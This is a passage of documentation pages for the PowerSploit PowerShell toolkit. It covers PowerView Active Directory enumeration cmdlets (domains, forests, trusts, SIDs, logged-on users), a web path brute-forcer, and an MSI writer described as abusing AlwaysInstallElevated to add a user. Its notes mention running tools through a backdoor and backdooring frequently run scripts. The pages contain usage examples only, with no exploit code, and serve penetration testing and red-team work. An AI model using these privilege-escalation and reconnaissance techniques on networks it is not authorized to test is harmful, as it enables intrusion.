9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Write-UserAddMSI [[-Path] ]
15 | ```
16 |
17 | ## DESCRIPTION
18 | Writes out a precompiled MSI installer that prompts for a user/group addition.
19 | This function can be used to abuse Get-RegistryAlwaysInstallElevated.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Write-UserAddMSI
26 | ```
27 |
28 | Writes the user add MSI to the local directory.
29 |
30 | ## PARAMETERS
31 |
32 | ### -Path
33 | {{Fill Path Description}}
34 |
35 | ```yaml
36 | Type: String
37 | Parameter Sets: (All)
38 | Aliases: ServiceName
39 |
40 | Required: False
41 | Position: 1
42 | Default value: UserAdd.msi
43 | Accept pipeline input: True (ByPropertyName, ByValue)
44 | Accept wildcard characters: False
45 | ```
46 |
47 | ## INPUTS
48 |
49 | ## OUTPUTS
50 |
51 | ### PowerUp.UserAddMSI
52 |
53 | ## NOTES
54 |
55 | ## RELATED LINKS
56 |
57 |
--------------------------------------------------------------------------------
/docs/Recon/ConvertTo-SID.md:
--------------------------------------------------------------------------------
1 | # ConvertTo-SID
2 |
3 | ## SYNOPSIS
4 | Converts a given user/group name to a security identifier (SID).
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | ConvertTo-SID [-ObjectName] [[-Domain] ] [[-Server] ] [[-Credential] ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Converts a "DOMAIN\username" syntax to a security identifier (SID)
18 | using System.Security.Principal.NTAccount's translate function.
19 | If alternate
20 | credentials are supplied, then Get-ADObject is used to try to map the name
21 | to a security identifier.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | ConvertTo-SID 'DEV\dfm'
28 | ```
29 |
30 | ### -------------------------- EXAMPLE 2 --------------------------
31 | ```
32 | 'DEV\dfm','DEV\krbtgt' | ConvertTo-SID
33 | ```
34 |
35 | ### -------------------------- EXAMPLE 3 --------------------------
36 | ```
37 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
38 | ```
39 |
40 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
41 | 'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred
42 |
43 | ## PARAMETERS
44 |
45 | ### -ObjectName
46 | The user/group name to convert, can be 'user' or 'DOMAIN\user' format.
47 |
48 | ```yaml
49 | Type: String[]
50 | Parameter Sets: (All)
51 | Aliases: Name, Identity
52 |
53 | Required: True
54 | Position: 1
55 | Default value: None
56 | Accept pipeline input: True (ByPropertyName, ByValue)
57 | Accept wildcard characters: False
58 | ```
59 |
60 | ### -Domain
61 | Specifies the domain to use for the translation, defaults to the current domain.
62 |
63 | ```yaml
64 | Type: String
65 | Parameter Sets: (All)
66 | Aliases:
67 |
68 | Required: False
69 | Position: 2
70 | Default value: None
71 | Accept pipeline input: False
72 | Accept wildcard characters: False
73 | ```
74 |
75 | ### -Server
76 | Specifies an Active Directory server (domain controller) to bind to for the translation.
77 |
78 | ```yaml
79 | Type: String
80 | Parameter Sets: (All)
81 | Aliases: DomainController
82 |
83 | Required: False
84 | Position: 3
85 | Default value: None
86 | Accept pipeline input: False
87 | Accept wildcard characters: False
88 | ```
89 |
90 | ### -Credential
91 | Specifies an alternate credential to use for the translation.
92 |
93 | ```yaml
94 | Type: PSCredential
95 | Parameter Sets: (All)
96 | Aliases:
97 |
98 | Required: False
99 | Position: 4
100 | Default value: [Management.Automation.PSCredential]::Empty
101 | Accept pipeline input: False
102 | Accept wildcard characters: False
103 | ```
104 |
105 | ## INPUTS
106 |
107 | ### String
108 |
109 | Accepts one or more username specification strings on the pipeline.
110 |
111 | ## OUTPUTS
112 |
113 | ### String
114 |
115 | A string representing the SID of the translated name.
116 |
117 | ## NOTES
118 |
119 | ## RELATED LINKS
120 |
121 |
--------------------------------------------------------------------------------
/docs/Recon/Export-PowerViewCSV.md:
--------------------------------------------------------------------------------
1 | # Export-PowerViewCSV
2 |
3 | ## SYNOPSIS
4 | Converts objects into a series of comma-separated (CSV) strings and saves the
5 | strings in a CSV file in a thread-safe manner.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Export-PowerViewCSV -InputObject [-Path] [[-Delimiter] ] [-Append]
15 | ```
16 |
17 | ## DESCRIPTION
18 | This helper exports an -InputObject to a .csv in a thread-safe manner
19 | using a mutex.
20 | This is so the various multi-threaded functions in
21 | PowerView has a thread-safe way to export output to the same file.
22 | Uses .NET IO.FileStream/IO.StreamWriter objects for speed.
23 |
24 | Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590
25 |
26 | ## EXAMPLES
27 |
28 | ### -------------------------- EXAMPLE 1 --------------------------
29 | ```
30 | Get-DomainUser | Export-PowerViewCSV -Path "users.csv"
31 | ```
32 |
33 | ### -------------------------- EXAMPLE 2 --------------------------
34 | ```
35 | Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|'
36 | ```
37 |
38 | ## PARAMETERS
39 |
40 | ### -InputObject
41 | Specifies the objects to export as CSV strings.
42 |
43 | ```yaml
44 | Type: PSObject[]
45 | Parameter Sets: (All)
46 | Aliases:
47 |
48 | Required: True
49 | Position: Named
50 | Default value: None
51 | Accept pipeline input: True (ByPropertyName, ByValue)
52 | Accept wildcard characters: False
53 | ```
54 |
55 | ### -Path
56 | Specifies the path to the CSV output file.
57 |
58 | ```yaml
59 | Type: String
60 | Parameter Sets: (All)
61 | Aliases:
62 |
63 | Required: True
64 | Position: 2
65 | Default value: None
66 | Accept pipeline input: False
67 | Accept wildcard characters: False
68 | ```
69 |
70 | ### -Delimiter
71 | Specifies a delimiter to separate the property values.
72 | The default is a comma (,)
73 |
74 | ```yaml
75 | Type: Char
76 | Parameter Sets: (All)
77 | Aliases:
78 |
79 | Required: False
80 | Position: 3
81 | Default value: ,
82 | Accept pipeline input: False
83 | Accept wildcard characters: False
84 | ```
85 |
86 | ### -Append
87 | Indicates that this cmdlet adds the CSV output to the end of the specified file.
88 | Without this parameter, Export-PowerViewCSV replaces the file contents without warning.
89 |
90 | ```yaml
91 | Type: SwitchParameter
92 | Parameter Sets: (All)
93 | Aliases:
94 |
95 | Required: False
96 | Position: Named
97 | Default value: False
98 | Accept pipeline input: False
99 | Accept wildcard characters: False
100 | ```
101 |
102 | ## INPUTS
103 |
104 | ### PSObject
105 |
106 | Accepts one or more PSObjects on the pipeline.
107 |
108 | ## OUTPUTS
109 |
110 | ## NOTES
111 |
112 | ## RELATED LINKS
113 |
114 | [http://poshcode.org/1590
115 | http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/](http://poshcode.org/1590
116 | http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/)
117 |
118 |
--------------------------------------------------------------------------------
/docs/Recon/Get-ComputerDetail.md:
--------------------------------------------------------------------------------
1 | # Get-ComputerDetail
2 |
3 | ## SYNOPSIS
4 | This script is used to get useful information from a computer.
5 |
6 | Function: Get-ComputerDetail
7 | Author: Joe Bialek, Twitter: @JosephBialek
8 | Required Dependencies: None
9 | Optional Dependencies: None
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-ComputerDetail [-ToString]
15 | ```
16 |
17 | ## DESCRIPTION
18 | This script is used to get useful information from a computer.
19 | Currently, the script gets the following information:
20 | -Explicit Credential Logons (Event ID 4648)
21 | -Logon events (Event ID 4624)
22 | -AppLocker logs to find what processes are created
23 | -PowerShell logs to find PowerShell scripts which have been executed
24 | -RDP Client Saved Servers, which indicates what servers the user typically RDP's in to
25 |
26 | ## EXAMPLES
27 |
28 | ### -------------------------- EXAMPLE 1 --------------------------
29 | ```
30 | Get-ComputerDetail
31 | ```
32 |
33 | Gets information about the computer and outputs it as PowerShell objects.
34 |
35 | Get-ComputerDetail -ToString
36 | Gets information about the computer and outputs it as raw text.
37 |
38 | ## PARAMETERS
39 |
40 | ### -ToString
41 | Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor.
42 |
43 | ```yaml
44 | Type: SwitchParameter
45 | Parameter Sets: (All)
46 | Aliases:
47 |
48 | Required: False
49 | Position: 1
50 | Default value: False
51 | Accept pipeline input: False
52 | Accept wildcard characters: False
53 | ```
54 |
55 | ## INPUTS
56 |
57 | ## OUTPUTS
58 |
59 | ## NOTES
60 | This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.
61 | You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files.
62 |
63 | ## RELATED LINKS
64 |
65 | [Blog: http://clymb3r.wordpress.com/
66 | Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/
67 | Github repo: https://github.com/clymb3r/PowerShell)
68 |
69 |
--------------------------------------------------------------------------------
/docs/Recon/Get-Domain.md:
--------------------------------------------------------------------------------
1 | # Get-Domain
2 |
3 | ## SYNOPSIS
4 | Returns the domain object for the current (or specified) domain.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-Domain [[-Domain] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current
18 | domain or the domain specified with -Domain X.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-Domain -Domain testlab.local
25 | ```
26 |
27 | ### -------------------------- EXAMPLE 2 --------------------------
28 | ```
29 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
30 | ```
31 |
32 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
33 | Get-Domain -Credential $Cred
34 |
35 | ## PARAMETERS
36 |
37 | ### -Domain
38 | Specifies the domain name to query for, defaults to the current domain.
39 |
40 | ```yaml
41 | Type: String
42 | Parameter Sets: (All)
43 | Aliases:
44 |
45 | Required: False
46 | Position: 1
47 | Default value: None
48 | Accept pipeline input: True (ByValue)
49 | Accept wildcard characters: False
50 | ```
51 |
52 | ### -Credential
53 | A \[Management.Automation.PSCredential\] object of alternate credentials
54 | for connection to the target domain.
55 |
56 | ```yaml
57 | Type: PSCredential
58 | Parameter Sets: (All)
59 | Aliases:
60 |
61 | Required: False
62 | Position: Named
63 | Default value: [Management.Automation.PSCredential]::Empty
64 | Accept pipeline input: False
65 | Accept wildcard characters: False
66 | ```
67 |
68 | ## INPUTS
69 |
70 | ## OUTPUTS
71 |
72 | ### System.DirectoryServices.ActiveDirectory.Domain
73 |
74 | A complex .NET domain object.
75 |
76 | ## NOTES
77 |
78 | ## RELATED LINKS
79 |
80 | [http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG](http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG)
81 |
82 |
--------------------------------------------------------------------------------
/docs/Recon/Get-DomainSID.md:
--------------------------------------------------------------------------------
1 | # Get-DomainSID
2 |
3 | ## SYNOPSIS
4 | Returns the SID for the current domain or the specified domain.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-DomainComputer
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-DomainSID [[-Domain] ] [[-Server] ] [[-Credential] ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns the SID for the current domain or the specified domain by executing
18 | Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192)
19 | to search for domain controllers through LDAP.
20 | The SID of the returned domain controller
21 | is then extracted.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-DomainSID
28 | ```
29 |
30 | ### -------------------------- EXAMPLE 2 --------------------------
31 | ```
32 | Get-DomainSID -Domain testlab.local
33 | ```
34 |
35 | ### -------------------------- EXAMPLE 3 --------------------------
36 | ```
37 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
38 | ```
39 |
40 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
41 | Get-DomainSID -Credential $Cred
42 |
43 | ## PARAMETERS
44 |
45 | ### -Domain
46 | Specifies the domain to use for the query, defaults to the current domain.
47 |
48 | ```yaml
49 | Type: String
50 | Parameter Sets: (All)
51 | Aliases:
52 |
53 | Required: False
54 | Position: 1
55 | Default value: None
56 | Accept pipeline input: False
57 | Accept wildcard characters: False
58 | ```
59 |
60 | ### -Server
61 | Specifies an Active Directory server (domain controller) to bind to.
62 |
63 | ```yaml
64 | Type: String
65 | Parameter Sets: (All)
66 | Aliases: DomainController
67 |
68 | Required: False
69 | Position: 2
70 | Default value: None
71 | Accept pipeline input: False
72 | Accept wildcard characters: False
73 | ```
74 |
75 | ### -Credential
76 | A \[Management.Automation.PSCredential\] object of alternate credentials
77 | for connection to the target domain.
78 |
79 | ```yaml
80 | Type: PSCredential
81 | Parameter Sets: (All)
82 | Aliases:
83 |
84 | Required: False
85 | Position: 3
86 | Default value: [Management.Automation.PSCredential]::Empty
87 | Accept pipeline input: False
88 | Accept wildcard characters: False
89 | ```
90 |
91 | ## INPUTS
92 |
93 | ## OUTPUTS
94 |
95 | ### String
96 |
97 | A string representing the specified domain SID.
98 |
99 | ## NOTES
100 |
101 | ## RELATED LINKS
102 |
103 |
--------------------------------------------------------------------------------
/docs/Recon/Get-Forest.md:
--------------------------------------------------------------------------------
1 | # Get-Forest
2 |
3 | ## SYNOPSIS
4 | Returns the forest object for the current (or specified) forest.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: ConvertTo-SID
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-Forest [[-Forest] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current
18 | forest or the forest specified with -Forest X.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-Forest -Forest external.domain
25 | ```
26 |
27 | ### -------------------------- EXAMPLE 2 --------------------------
28 | ```
29 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
30 | ```
31 |
32 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
33 | Get-Forest -Credential $Cred
34 |
35 | ## PARAMETERS
36 |
37 | ### -Forest
38 | The forest name to query for, defaults to the current forest.
39 |
40 | ```yaml
41 | Type: String
42 | Parameter Sets: (All)
43 | Aliases:
44 |
45 | Required: False
46 | Position: 1
47 | Default value: None
48 | Accept pipeline input: True (ByValue)
49 | Accept wildcard characters: False
50 | ```
51 |
52 | ### -Credential
53 | A \[Management.Automation.PSCredential\] object of alternate credentials
54 | for connection to the target forest.
55 |
56 | ```yaml
57 | Type: PSCredential
58 | Parameter Sets: (All)
59 | Aliases:
60 |
61 | Required: False
62 | Position: Named
63 | Default value: [Management.Automation.PSCredential]::Empty
64 | Accept pipeline input: False
65 | Accept wildcard characters: False
66 | ```
67 |
68 | ## INPUTS
69 |
70 | ## OUTPUTS
71 |
72 | ### System.Management.Automation.PSCustomObject
73 |
74 | Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition
75 | to the forest root domain SID.
76 |
77 | ## NOTES
78 |
79 | ## RELATED LINKS
80 |
81 |
--------------------------------------------------------------------------------
/docs/Recon/Get-ForestDomain.md:
--------------------------------------------------------------------------------
1 | # Get-ForestDomain
2 |
3 | ## SYNOPSIS
4 | Return all domains for the current (or specified) forest.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-Forest
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ForestDomain [[-Forest] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns all domains for the current forest or the forest specified
18 | by -Forest X.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-ForestDomain
25 | ```
26 |
27 | ### -------------------------- EXAMPLE 2 --------------------------
28 | ```
29 | Get-ForestDomain -Forest external.local
30 | ```
31 |
32 | ### -------------------------- EXAMPLE 3 --------------------------
33 | ```
34 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
35 | ```
36 |
37 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
38 | Get-ForestDomain -Credential $Cred
39 |
40 | ## PARAMETERS
41 |
42 | ### -Forest
43 | Specifies the forest name to query for domains.
44 |
45 | ```yaml
46 | Type: String
47 | Parameter Sets: (All)
48 | Aliases:
49 |
50 | Required: False
51 | Position: 1
52 | Default value: None
53 | Accept pipeline input: True (ByValue)
54 | Accept wildcard characters: False
55 | ```
56 |
57 | ### -Credential
58 | A \[Management.Automation.PSCredential\] object of alternate credentials
59 | for connection to the target forest.
60 |
61 | ```yaml
62 | Type: PSCredential
63 | Parameter Sets: (All)
64 | Aliases:
65 |
66 | Required: False
67 | Position: Named
68 | Default value: [Management.Automation.PSCredential]::Empty
69 | Accept pipeline input: False
70 | Accept wildcard characters: False
71 | ```
72 |
73 | ## INPUTS
74 |
75 | ## OUTPUTS
76 |
77 | ### System.DirectoryServices.ActiveDirectory.Domain
78 |
79 | ## NOTES
80 |
81 | ## RELATED LINKS
82 |
83 |
--------------------------------------------------------------------------------
/docs/Recon/Get-ForestGlobalCatalog.md:
--------------------------------------------------------------------------------
1 | # Get-ForestGlobalCatalog
2 |
3 | ## SYNOPSIS
4 | Return all global catalogs for the current (or specified) forest.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-Forest
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ForestGlobalCatalog [[-Forest] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Returns all global catalogs for the current forest or the forest specified
18 | by -Forest X by using Get-Forest to retrieve the specified forest object
19 | and the .FindAllGlobalCatalogs() to enumerate the global catalogs.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-ForestGlobalCatalog
26 | ```
27 |
28 | ### -------------------------- EXAMPLE 2 --------------------------
29 | ```
30 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
31 | ```
32 |
33 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
34 | Get-ForestGlobalCatalog -Credential $Cred
35 |
36 | ## PARAMETERS
37 |
38 | ### -Forest
39 | Specifies the forest name to query for global catalogs.
40 |
41 | ```yaml
42 | Type: String
43 | Parameter Sets: (All)
44 | Aliases:
45 |
46 | Required: False
47 | Position: 1
48 | Default value: None
49 | Accept pipeline input: True (ByValue)
50 | Accept wildcard characters: False
51 | ```
52 |
53 | ### -Credential
54 | A \[Management.Automation.PSCredential\] object of alternate credentials
55 | for connection to the target domain.
56 |
57 | ```yaml
58 | Type: PSCredential
59 | Parameter Sets: (All)
60 | Aliases:
61 |
62 | Required: False
63 | Position: Named
64 | Default value: [Management.Automation.PSCredential]::Empty
65 | Accept pipeline input: False
66 | Accept wildcard characters: False
67 | ```
68 |
69 | ## INPUTS
70 |
71 | ## OUTPUTS
72 |
73 | ### System.DirectoryServices.ActiveDirectory.GlobalCatalog
74 |
75 | ## NOTES
76 |
77 | ## RELATED LINKS
78 |
79 |
--------------------------------------------------------------------------------
/docs/Recon/Get-ForestTrust.md:
--------------------------------------------------------------------------------
1 | # Get-ForestTrust
2 |
3 | ## SYNOPSIS
4 | Return all forest trusts for the current forest or a specified forest.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Get-Forest
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-ForestTrust [[-Forest] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | This function will enumerate domain trust relationships for the current (or a remote)
18 | forest using number of method using the .NET method GetAllTrustRelationships() on a
19 | System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-ForestTrust
26 | ```
27 |
28 | Return current forest trusts.
29 |
30 | ### -------------------------- EXAMPLE 2 --------------------------
31 | ```
32 | Get-ForestTrust -Forest "external.local"
33 | ```
34 |
35 | Return trusts for the "external.local" forest.
36 |
37 | ### -------------------------- EXAMPLE 3 --------------------------
38 | ```
39 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
40 | ```
41 |
42 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
43 | Get-ForestTrust -Forest "external.local" -Credential $Cred
44 |
45 | Return trusts for the "external.local" forest using the specified alternate credenitals.
46 |
47 | ## PARAMETERS
48 |
49 | ### -Forest
50 | Specifies the forest to query for trusts, defaults to the current forest.
51 |
52 | ```yaml
53 | Type: String
54 | Parameter Sets: (All)
55 | Aliases: Name
56 |
57 | Required: False
58 | Position: 1
59 | Default value: None
60 | Accept pipeline input: True (ByPropertyName, ByValue)
61 | Accept wildcard characters: False
62 | ```
63 |
64 | ### -Credential
65 | A \[Management.Automation.PSCredential\] object of alternate credentials
66 | for connection to the target domain.
67 |
68 | ```yaml
69 | Type: PSCredential
70 | Parameter Sets: (All)
71 | Aliases:
72 |
73 | Required: False
74 | Position: Named
75 | Default value: [Management.Automation.PSCredential]::Empty
76 | Accept pipeline input: False
77 | Accept wildcard characters: False
78 | ```
79 |
80 | ## INPUTS
81 |
82 | ## OUTPUTS
83 |
84 | ### PowerView.DomainTrust.NET
85 |
86 | A TrustRelationshipInformationCollection returned when using .NET methods (default).
87 |
88 | ## NOTES
89 |
90 | ## RELATED LINKS
91 |
92 |
--------------------------------------------------------------------------------
/docs/Recon/Get-HttpStatus.md:
--------------------------------------------------------------------------------
1 | # Get-HttpStatus
2 |
3 | ## SYNOPSIS
4 | Returns the HTTP Status Codes and full URL for specified paths.
5 |
6 | PowerSploit Function: Get-HttpStatus
7 | Author: Chris Campbell (@obscuresec)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Get-HttpStatus [-Target] [[-Path] ] [[-Port] ] [-UseSSL]
16 | ```
17 |
18 | ## DESCRIPTION
19 | A script to check for the existence of a path or file on a webserver.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*}
26 | ```
27 |
28 | ### -------------------------- EXAMPLE 2 --------------------------
29 | ```
30 | Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL
31 | ```
32 |
33 | ## PARAMETERS
34 |
35 | ### -Target
36 | Specifies the remote web host either by IP or hostname.
37 |
38 | ```yaml
39 | Type: String
40 | Parameter Sets: (All)
41 | Aliases:
42 |
43 | Required: True
44 | Position: 1
45 | Default value: None
46 | Accept pipeline input: False
47 | Accept wildcard characters: False
48 | ```
49 |
50 | ### -Path
51 | Specifies the remost host.
52 |
53 | ```yaml
54 | Type: String
55 | Parameter Sets: (All)
56 | Aliases:
57 |
58 | Required: False
59 | Position: 2
60 | Default value: .\Dictionaries\admin.txt
61 | Accept pipeline input: False
62 | Accept wildcard characters: False
63 | ```
64 |
65 | ### -Port
66 | Specifies the port to connect to.
67 |
68 | ```yaml
69 | Type: Int32
70 | Parameter Sets: (All)
71 | Aliases:
72 |
73 | Required: False
74 | Position: 3
75 | Default value: 0
76 | Accept pipeline input: False
77 | Accept wildcard characters: False
78 | ```
79 |
80 | ### -UseSSL
81 | Use an SSL connection.
82 |
83 | ```yaml
84 | Type: SwitchParameter
85 | Parameter Sets: (All)
86 | Aliases:
87 |
88 | Required: False
89 | Position: Named
90 | Default value: False
91 | Accept pipeline input: False
92 | Accept wildcard characters: False
93 | ```
94 |
95 | ## INPUTS
96 |
97 | ## OUTPUTS
98 |
99 | ## NOTES
100 | HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error
101 |
102 | ## RELATED LINKS
103 |
104 | [http://obscuresecurity.blogspot.com
105 | http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html]()
106 |
107 |
--------------------------------------------------------------------------------
/docs/Recon/Get-NetComputerSiteName.md:
--------------------------------------------------------------------------------
1 | # Get-NetComputerSiteName
2 |
3 | ## SYNOPSIS
4 | Returns the AD site where the local (or a remote) machine resides.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-NetComputerSiteName [[-ComputerName] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | This function will use the DsGetSiteName Win32API call to look up the
18 | name of the site where a specified computer resides.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local
25 | ```
26 |
27 | Returns the site for WINDOWS1.testlab.local.
28 |
29 | ### -------------------------- EXAMPLE 2 --------------------------
30 | ```
31 | Get-DomainComputer | Get-NetComputerSiteName
32 | ```
33 |
34 | Returns the sites for every machine in AD.
35 |
36 | ### -------------------------- EXAMPLE 3 --------------------------
37 | ```
38 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
39 | ```
40 |
41 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
42 | Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred
43 |
44 | ## PARAMETERS
45 |
46 | ### -ComputerName
47 | Specifies the hostname to check the site for (also accepts IP addresses).
48 | Defaults to 'localhost'.
49 |
50 | ```yaml
51 | Type: String[]
52 | Parameter Sets: (All)
53 | Aliases: HostName, dnshostname, name
54 |
55 | Required: False
56 | Position: 1
57 | Default value: Localhost
58 | Accept pipeline input: True (ByPropertyName, ByValue)
59 | Accept wildcard characters: False
60 | ```
61 |
62 | ### -Credential
63 | A \[Management.Automation.PSCredential\] object of alternate credentials
64 | for connection to the remote system using Invoke-UserImpersonation.
65 |
66 | ```yaml
67 | Type: PSCredential
68 | Parameter Sets: (All)
69 | Aliases:
70 |
71 | Required: False
72 | Position: Named
73 | Default value: [Management.Automation.PSCredential]::Empty
74 | Accept pipeline input: False
75 | Accept wildcard characters: False
76 | ```
77 |
78 | ## INPUTS
79 |
80 | ## OUTPUTS
81 |
82 | ### PowerView.ComputerSite
83 |
84 | A PSCustomObject containing the ComputerName, IPAddress, and associated Site name.
85 |
86 | ## NOTES
87 |
88 | ## RELATED LINKS
89 |
90 |
--------------------------------------------------------------------------------
/docs/Recon/Get-NetLoggedon.md:
--------------------------------------------------------------------------------
1 | # Get-NetLoggedon
2 |
3 | ## SYNOPSIS
4 | Returns users logged on the local (or a remote) machine.
5 | Note: administrative rights needed for newer Windows OSes.
6 |
7 | Author: Will Schroeder (@harmj0y)
8 | License: BSD 3-Clause
9 | Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
10 |
11 | ## SYNTAX
12 |
13 | ```
14 | Get-NetLoggedon [[-ComputerName] ] [-Credential ]
15 | ```
16 |
17 | ## DESCRIPTION
18 | This function will execute the NetWkstaUserEnum Win32API call to query
19 | a given host for actively logged on users.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-NetLoggedon
26 | ```
27 |
28 | Returns users actively logged onto the local host.
29 |
30 | ### -------------------------- EXAMPLE 2 --------------------------
31 | ```
32 | Get-NetLoggedon -ComputerName sqlserver
33 | ```
34 |
35 | Returns users actively logged onto the 'sqlserver' host.
36 |
37 | ### -------------------------- EXAMPLE 3 --------------------------
38 | ```
39 | Get-DomainComputer | Get-NetLoggedon
40 | ```
41 |
42 | Returns all logged on users for all computers in the domain.
43 |
44 | ### -------------------------- EXAMPLE 4 --------------------------
45 | ```
46 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
47 | ```
48 |
49 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
50 | Get-NetLoggedon -ComputerName sqlserver -Credential $Cred
51 |
52 | ## PARAMETERS
53 |
54 | ### -ComputerName
55 | Specifies the hostname to query for logged on users (also accepts IP addresses).
56 | Defaults to 'localhost'.
57 |
58 | ```yaml
59 | Type: String[]
60 | Parameter Sets: (All)
61 | Aliases: HostName, dnshostname, name
62 |
63 | Required: False
64 | Position: 1
65 | Default value: Localhost
66 | Accept pipeline input: True (ByPropertyName, ByValue)
67 | Accept wildcard characters: False
68 | ```
69 |
70 | ### -Credential
71 | A \[Management.Automation.PSCredential\] object of alternate credentials
72 | for connection to the remote system using Invoke-UserImpersonation.
73 |
74 | ```yaml
75 | Type: PSCredential
